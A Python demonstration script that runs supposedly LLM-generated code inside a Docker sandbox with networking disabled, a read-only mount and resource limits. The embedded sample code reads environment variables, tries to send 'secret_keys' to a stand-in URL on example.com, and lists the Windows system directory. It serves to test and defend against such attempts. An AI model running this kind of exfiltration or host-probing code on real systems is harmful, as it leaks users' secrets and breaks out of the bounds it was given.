import subprocess
import os

# 1. The manipulated (malicious) code generated by the LLM.
# Normally, this text would be returned as an API response from OpenAI/Gemini.
llm_generated_code = """
import os
import urllib.request

print("[AGENT] Logs analyzed, applying solution...")
print("[AGENT] Reading system environment variables (Attempting to steal secrets)...")
env_vars = os.environ

try:
    # MALICIOUS ACTION 1: Attempt to exfiltrate data
    print("[AGENT] Sending data to external server...")
    urllib.request.urlopen("http://example.com/steal?data=secret_keys", timeout=3)
    print("[AGENT] Exfiltration successful!")
except Exception as e:
    print(f"[PROTECTION ACTIVE] External network access blocked! Detail: {e}")

try:
    # MALICIOUS ACTION 2: Attempt to access host file system
    print("[AGENT] Attempting to access C:\\\\Windows directory...")
    os.listdir("C:\\\\Windows")
    print("[AGENT] Files accessed successfully!")
except Exception as e:
    print(f"[PROTECTION ACTIVE] No access to host file system! Detail: {e}")
"""

# 2. Write this generated code to a temporary file
script_name = "temp_agent_script.py"
current_dir = os.getcwd()
script_path = os.path.join(current_dir, script_name)

with open(script_path, "w", encoding="utf-8") as f:
    f.write(llm_generated_code)

print("--- RUNNING AGENT CODE INSIDE SANDBOX ---\n")

# 3. Isolation (Sandbox) Parameters
docker_command = [
    "docker", "run",
    "--rm",                                     # Remove container automatically when done
    "--network", "none",                        # Completely disable external network (Internet)
    "-v", f"{script_path}:/app/script.py:ro",   # Mount the script as Read-Only
    "--memory", "128m",                         # Limit RAM usage
    "--cpus", "0.5",                            # Limit CPU usage
    "python:3.12-alpine",                       # Lightweight image without unnecessary network tools
    "python", "/app/script.py"                  # Execute the provided script
]

try:
    # Run the code and capture the output. Timeout set to 30s to prevent infinite loops.
    result = subprocess.run(docker_command, capture_output=True, text=True, timeout=30)
    
    print("--- SANDBOX OUTPUT ---")
    print(result.stdout)
    
    if result.stderr:
        print("--- ERROR OUTPUT ---")
        print(result.stderr)
        
except subprocess.TimeoutExpired:
    print("[ERROR] Process timed out. The agent might have entered an infinite loop or the Docker image is still downloading.")
finally:
    # Cleanup: Delete the temporary script from the host system
    if os.path.exists(script_path):
        os.remove(script_path)